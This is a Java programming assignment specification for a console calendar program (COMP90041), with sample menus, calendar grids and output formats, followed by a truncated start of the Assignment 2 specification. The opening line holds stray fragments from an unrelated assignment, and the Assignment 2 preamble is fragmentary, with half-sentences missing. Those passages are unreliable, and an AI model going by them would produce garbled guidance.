dictionary of words.my_answer will contain the following for each iteration:Figure 1: Ignore this figure.The class Bad_AI would have the following complexity:[1] From https://en.wikipedia.org/wiki/Levenshtein_distance
IntroductionWelcome to the first of your assignments for COMP90041 – Programming and Software Development!For this project, we will be implementing the calendar app but on a console (terminal).This program will be built in two parts (Assignment 1 and Assignment 2), with Assignment 1 building the groundwork for the final system in Assignment 2.In Assignment 1, we will build an initial system implementation based on what we’ve learned about object-oriented programming so far. In Assignment 2, we will extend the system with additional features, and also refactor existing features with newly learned Object Oriented Programming concepts, to make our code more elegant.This project intends to give you practice with basic Java concepts and basics of object-oriented software development and design, as well as some experience in developing software as requirements for a system’s evolution. It also provides some good experience in building a system part by part from scratch, until an overall system is complete.Preamble: “The Specifications”The slides from this lesson module for the assignment act as “the specifications” for the system we are about to build. “The specifications” in real-life software development is the document that details the features that should be implemented in any particular project. They are the features and requirements that you, the Software Developer, and the client have agreed should be implemented in the system. As such, you should read these specifications carefully and ensure that your program implements the requirements of the specification correctly. Tests will be run on your program to check that you have implemented these specifications correctly. When you hit the mark button, your code is submitted and tests are run on your code after compiling it. This is an automatic process and you can make as many submissions as you want before the deadline. If you make submissions after the deadline, they are marked Late and not assessed until you have a valid extension. If you have a valid extension and see your submission is marked Late, do not worry about it. We will mark the assessment as per your extension. Note that for this project, we will provide 13 visible tests that you can run to check that the basic functionality of your system is correct. However, there will also be 7 hidden (i.e., invisible) tests that we will run when assessing the correctness of your code. You won’t be able to see why your hidden tests failed but you can see that they failed and rectify your code. So once your program passes the basic tests, we strongly recommend that you perform further tests yourself, to ensure that the required features have been implemented correctly. How to read the specifications? Some parts of the specification may need you to use specific methods from Java in-built System or Util libraries. Or there can be certain assumptions that are okay to make by the students. We will provide additional help/suggestions using a green callout like the example provided below. Tip: use a specific string method like toLowerCase or something. Some specifications are treated as warnings. If not implemented correctly, they can cause incorrect output. They are shown in yellow warning callouts like the example provided below. Warning: Read this section carefully. Some additional texts to tell you what can go wrong. Some texts could be just informational. They neither cause you problems nor help you but guide you gently on what to do next. They will be shown in blue callouts like the example provided below. Note: Perhaps re-read this section first and then go to other section. Lastly, sometimes a developer thinks exhaustively and engages in continuous discussion with people to gather more information. We try to keep certain use cases out of scope as they add more complexity to the system. Some advanced developers can cope through it but we would like to keep some things simpler for beginners. Please read carefully through the out-of-scope specifications as well. This may be embedded as a red strip in the specifications sometimes. Out of Scope Scenario: This scenario …….. is out of scope for this assignment Other than this, we will use the general informational, warning, error, and assumption callouts using blue, yellow, red, and green coloured callouts. Also, note that the code snippets have some characters in bold that represent the inputs to the program. Assumption: Students can assume that test cases only contain outputs that are explicitly part of specifications. The test cases, visible or hidden, do not produce any output that is not mentioned in the specifications explicitly. Please note that the specifications will give you warnings and important notes where we expect special input handling. You should observe those and implement them accordingly as they will be tested while marking your program.Preamble: Intended Learning OutcomeThe Intended Learning Outcomes for this Assignment are mentioned below –The concepts used are from Week 1 to Week 6.ArrayLists are not allowed for this assignment. The intention is to test the above ILOs and hence use of ArrayLists are prohibited.A warning for those that have previous experience programming in other programming languages (like C or Python) that follow a procedural programming paradigm: Be careful to develop your program using object oriented principles, as programming and structuring your code in a way that is not object-oriented is an easy way to lose marks for structure in the assignments.Preamble: Java Coding ConventionsWe will also be assessing your code for good structure and style.Use methods when appropriate to simplify your code, and avoid duplicate code.Use correct Java naming conventions for class names, variable names, and method names and put them in a well-organised way in your code i.e. it should be readable as well.Make sure the names you choose are meaningful, to improve the readability of your code.We will provide a marking scheme to help guide you in the development of your program. Also we will guide you how to model your program. But using correct syntaxes and conventions can be learnt here.Calendar ConsoleWelcome to CalendarConsole (aka CalCon).We will not develop a UI-based calendar here as it needs an advanced level of programming. We will develop some features from a calendar app but with a console-based input.Warning: The program expects some command line parameters that we will discuss in CalendarInitialisation section. These command line parameters are set in EdStem platform and will be available to the program when you hit the submit/mark button. But if you are trying this in an IDE, you may have to set the command line parameters yourself using command line or IDE Run/Debug features. More details in Additional Help section.Calendar InitialisationCalendarThe calendar is a 6×7 matrix (6rows 7 columns) that can be represented by a 2D array. The calendar starts from Monday. Below is a representation of calendar in a console. The numbers represents day of the month.————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | 2 | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Each row represents three things –Command Line ArgumentsRead some command line args to set the year, month, day from which the calendar starts. The program must take command line inputs in the below order.This means when you compile your program and run it, the commands on the terminal should look like thisjavac CalCon.javajava CalCon 2025 04 12Warning: You must not hard code this in your program. We may provide all kind of integer outputs to test these.In case there are insufficient inputs (missing input) or if any of the input is 0 or negative, then exit the program by printing the error message –javac CalCon.javajava CalCon 2025 04 -12Invalid Year/Month/Day. Exiting Program.Note: These command line parameters are set in EdStem platform and will be available to your program when you hit the submit/mark button. But if you are trying this in an IDE, you may have to set the command line parameters yourself using command line or IDE features.If the inputs are valid, the program will show a calendar view.Out of Scope: You can assume that the command line arguments are always integers and not String/Double or any other data types.How to initialise/create the calendar?This will create an empty calendar with each calendar entry set with the date with no events.Date.java is provided to you. You can add methods to it if you need. But you must not change existing methods presented to you. Or simply use the methods available in this class to work. You do not need any external java libraries to manage the date.Main MenuMain MenuOnce the calendar is initialised the program will show the Calendar initialised with dates and the cursor ‘x’ on the first date. The next thing to show is the main menu for the user to select and perform some operations.————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>The program should then take a user input and perform one of the actions out of the 7 given.Exit OptionIn case the user selects option 7, the program must gracefully quit the program and print a goodbye message.Warning: Do not use System.exit() as it is not a graceful exit.Look at the complete output below.————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 7Exiting CalCon Now.Note: The text in bold represents user input here. You don’t need to make the console inputs bold in your code.Invalid CommandIn case the user provides an invalid input like 8 or 9, the program should be able to print “Invalid Input” and show the main menu. Sample output————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 8Invalid input.————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Out of Scope: The program only expects an integer value for the main menu. You do not need to handle string or double values as input at this point of time for the main menu.Move CursorTo add/edit/delete the event(s) in the calendar, user must select a date first. To select a date, the user should be able to navigate the calendar dates. There are 4 options present in the main menu for the user to navigate.We will now look at these options closely.Option 1:When the user presses 1, the cursor moves to the one right i.e. to the next date. See the output below –————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 1————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | x | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Special Cases –————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | x || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 1Invalid location on calendar.————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | x || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Option 2:When the user selects option 2, the cursor should move to the one left. See the output below –————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | x || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 2————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | x | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Special Cases-Option 3 & 4:If the user selects option 3 move the cursor’s position to the first date of the calendar. Similarly, if the user selects option 4, move the cursor to the last date of the calendar shown. See output below –————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | x | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 3————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || x | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 4————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | x || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Note that if the cursor is already at the designated place, and the user selects option 3 or 4, the program will simply reprint the calendar and the main menu again.EventsOption 5: Move to current selected date’s submenu optionsWhen the user selects option 5 this means that the user wants to add/modify/delete events for that particular date. The program should print a sub menu when the user selects option 5.————————————| M | T | W | T | F | S | S |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | x | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 5Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.Once the submenu is printed, the user can take multiple actions.Option A: Adding an eventTo add an event the program must take certain data inputs from the user. Once taken, it should add the event to that date. Note that there could be more than one event added to a date. Once an event is added and the user returns to the main menu, the calendar should also show the updated count for the number of events present on a date. See the output below –————————————| M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 01 | 02 | 03 || | x | | | | | || | | | | | | |————————————| 04 | 05 | 06 | 07 | 08 | 09 | 10 || | | | | | | || | | | | | | |————————————| 11 | 12 | 13 | 14 | 15 | 16 | 17 || | | | | | | || | | | | | | |————————————| 18 | 19 | 20 | 21 | 22 | 23 | 24 || | | | | | | || | | | | | | |————————————| 25 | 26 | 27 | 28 | 29 | 30 | 31 || | | | | | | || | | | | | | |————————————| 01 | 02 | 03 | 04 | 05 | 06 | 07 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 5Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ATo add an event, enter the following detailsEvent Type (REMINDER, BIRTHDAY, ANNIVERSARY, MEETING) : MEETINGStart Time (HHmm) : 0900End Time (HHmm) : 1000Description : Test testEvent added successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> Q————————————| M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 01 | 02 | 03 || | x | | | | | || | 1 | | | | | |————————————| 04 | 05 | 06 | 07 | 08 | 09 | 10 || | | | | | | || | | | | | | |————————————| 11 | 12 | 13 | 14 | 15 | 16 | 17 || | | | | | | || | | | | | | |————————————| 18 | 19 | 20 | 21 | 22 | 23 | 24 || | | | | | | || | | | | | | |————————————| 25 | 26 | 27 | 28 | 29 | 30 | 31 || | | | | | | || | | | | | | |————————————| 01 | 02 | 03 | 04 | 05 | 06 | 07 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Option E: Editing an eventTo edit an event, the user should select the event number to edit from. Thus we will show all the events on the selected date and let the user choose from the event to edit. Once the event number is selected, the program should prompt the user to input details similar to the add event scenario. See the output below –————————————| M | T | W | T | F | S | S |————————————| 26 | 27 | 28 | 29 | 01 | 02 | 03 || | x | | | | | || | 2 | | | | | |————————————| 04 | 05 | 06 | 07 | 08 | 09 | 10 || | | | | | | || | | | | | | |————————————| 11 | 12 | 13 | 14 | 15 | 16 | 17 || | | | | | | || | | | | | | |————————————| 18 | 19 | 20 | 21 | 22 | 23 | 24 || | | | | | | || | | | | | | |————————————| 25 | 26 | 27 | 28 | 29 | 30 | 31 || | | | | | | || | | | | | | |————————————| 01 | 02 | 03 | 04 | 05 | 06 | 07 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 5Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> ETo edit an event, select an event number from below –Following event(s) found for the day –> 2To edit this event, enter the following detailsEvent Type (REMINDER, BIRTHDAY, ANNIVERSARY, MEETING) : BIRTHDAYStart Time (HHmm) : 0900End Time (HHmm) : 1000Description : Trina’s BdayEvent updated successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Option D: Deleting an eventDeleting an event is similar to editing an event. The user must choose the event number from the list of events present on the day to delete. See the output below –Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> DTo delete an event, select an event number from below –Following event(s) found for the day –> 2Event deleted successfully.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>If the user selects option V after this, the deleted event should not be present in the list.Option V: Viewing an eventViewing a day’s event will simply list all the events present on the selected day.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> VFollowing event(s) found for the day –Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Use the formatter “%d. %s Event %s: %s – %s%n” to print a single event for the day in a loop.Option Q: Quitting the submenuIf the user selects Q, the program must quit the submenu, print the calendar view and go back to the main menu.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> Q————————————| M | T | W | T | F | S | S |————————————| 24 | 25 | 26 | 27 | 28 | 01 | 02 || x | | | | | | || 2 | | | | | | |————————————| 03 | 04 | 05 | 06 | 07 | 08 | 09 || | | | | | | || | | | | | | |————————————| 10 | 11 | 12 | 13 | 14 | 15 | 16 || | | | | | | || | | | | | | |————————————| 17 | 18 | 19 | 20 | 21 | 22 | 23 || | | | | | | || | | | | | | |————————————| 24 | 25 | 26 | 27 | 28 | 29 | 30 || | | | | | | || | | | | | | |————————————| 31 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Special CaseIn case of editing/deleting/viewing if there are no events present for the day, show the error message and print the submenu.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> VThere are no events marked in the calendar for the day.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Invalid OptionNote that the submenu receives an input string for A/E/D/V/Q. Thus any input which is a string but is not an valid option should be handled accordingly with an error message printed.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.> KInvalid input.Press V to view all events.Press A to add an event.Press E to edit an event.Press D to delete an event.Press Q to exit.>Tip: String comparison for A/D/E/V/Q ? Consider case insensitivity while comparison.Option 6: Viewing all the events in the calendarIf the user wants to see all the events marked in the calendar, the program must present it in a tabular form.————————————| M | T | W | T | F | S | S |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | x | | | | || 2 | | 1 | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————| 12 | 13 | 14 | 15 | 16 | 17 | 18 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 6————————————————————————————————————ID Date Start Time End Time Event Type Description————————————————————————————————————1 2025-04-07 0900 1130 MEETING STUDENT REP2 2025-04-07 0000 2359 BIRTHDAY Jane Doe’s Bday3 2025-04-09 0000 2359 BIRTHDAY Trina Dey’s Bday———————————————————————————————————— ————————————| M | T | W | T | F | S | S |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | x | | | | || 2 | | 1 | | | | |————————————| 14 | 15 | 16 | 17 | 18 | 19 | 20 || | | | | | | || | | | | | | |————————————| 21 | 22 | 23 | 24 | 25 | 26 | 27 || | | | | | | || | | | | | | |————————————| 28 | 29 | 30 | 01 | 02 | 03 | 04 || | | | | | | || | | | | | | |————————————| 05 | 06 | 07 | 08 | 09 | 10 | 11 || | | | | | | || | | | | | | |————————————| 12 | 13 | 14 | 15 | 16 | 17 | 18 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>However, if the calendar has no events, the program should show an error message.————————————| M | T | W | T | F | S | S |————————————| 02 | 03 | 04 | 05 | 06 | 07 | 08 || | x | | | | | || | | | | | | |————————————| 09 | 10 | 11 | 12 | 13 | 14 | 15 || | | | | | | || | | | | | | |————————————| 16 | 17 | 18 | 19 | 20 | 21 | 22 || | | | | | | || | | | | | | |————————————| 23 | 24 | 25 | 26 | 27 | 28 | 29 || | | | | | | || | | | | | | |————————————| 30 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.> 6No events present in the calendar.————————————| M | T | W | T | F | S | S |————————————| 02 | 03 | 04 | 05 | 06 | 07 | 08 || | x | | | | | || | | | | | | |————————————| 09 | 10 | 11 | 12 | 13 | 14 | 15 || | | | | | | || | | | | | | |————————————| 16 | 17 | 18 | 19 | 20 | 21 | 22 || | | | | | | || | | | | | | |————————————| 23 | 24 | 25 | 26 | 27 | 28 | 29 || | | | | | | || | | | | | | |————————————| 30 | 01 | 02 | 03 | 04 | 05 | 06 || | | | | | | || | | | | | | |————————————| 07 | 08 | 09 | 10 | 11 | 12 | 13 || | | | | | | || | | | | | | |————————————Select an option to proceed.Press 1 to move to next date.Press 2 to move to previous date.Press 3 to jump to start.Press 4 to jump to end.Press 5 to enter current selection’s sub menu.Press 6 to view all events in a calendar.Press 7 to exit.>Tip: Use the pattern %2s%12s%12s%12s%12s%40s%n for the formatted output.Out of Scope: When your program terminates you don’t have to save the calendar events or any other data. The program resets to default.
Welcome to Assignment 2 for COMP90041 – Programming and Software Development!In this assignment, we will extend the Calendar Console to add new featureslike – The slides from this lesson module for the assignment act as “the specifications” for the system we are about to build.“The specifications” in real-life software development is the document that details the features that should be implemented in any particular project. They are the features and requirements that you, the Software Developer, and the client have agreed should be implemented in the system.As such, you should read these specifications carefully and ensure that your program implements the requirements of the specification correctly.Tests will be run on your program to check that you have implemented these specifications correctly. Note that for the Assignment 2, we will provide 10 visible tests and 6 hidden tests that you can run to check that the basic functionality of your system is correct.Tip: Look at the assets file present. Think about what can the hidden test cases be about by looking at the data and perform your own testing.So once your program passes the basic tests, we strongly recommend that you perform further tests yourself, to ensure that the required features have been implemented correctly.How to read the specifications?inputs.Best Case Scenario: This section describes a real-life intended scenario.This will be notified using a green strip as shown below –Carried Forward: This section is referred as is from Assignment 1be tested and are shown below –Worst Case Scenario: Your program may behave incorrectly if not handled explicitly.modifications. This will be notified using a yellow strip.Modifications: This section is referred from Assignment 1 with slight modificationslike below-Addition: This specification is entirely new to Assignment 2.embedded as a red strip in the specifications.Out of Scope Scenario: This scenario …….. is out of scope for this assignmentcallouts.represent the inputs to the program.Students can assume that test cases only contain outputs that are explicitly part of specifications. The test cases do not produce any output that is not mentioned in the specifications explicitly. Please note that the specifications will give you warnings and important notes where we expect special input handling. You should observe those and implement them accordingly as they will be tested while marking your program. The Intended Learning Outcomes for the final Project are mentioned below –cases in specifications.use java.nio.Files methods.applies to incorrect usage.penalty or extra marks for using Generics.A warning to those who have previous programming experience in other programming languages (like C or Python) that follow a procedural programming paradigm: Be careful to develop your program using object-oriented principles, as programming and structuring your code in a way that is not object-oriented is an easy way to lose marks for structure in the assignments. We will also be assessing your code for good structure and style.Use methods when appropriate to simplify your code, and avoid duplicate code.Use correct Java naming conventions for class names, variable names, and method names and put them in a well-organised way in your code i.e. it should be readable as well. Look at the conventions provided by Oracle here.The code structure in a file is very important and improves readability.Look at the code organisation conventions provided by Oracle here. Make sure the names 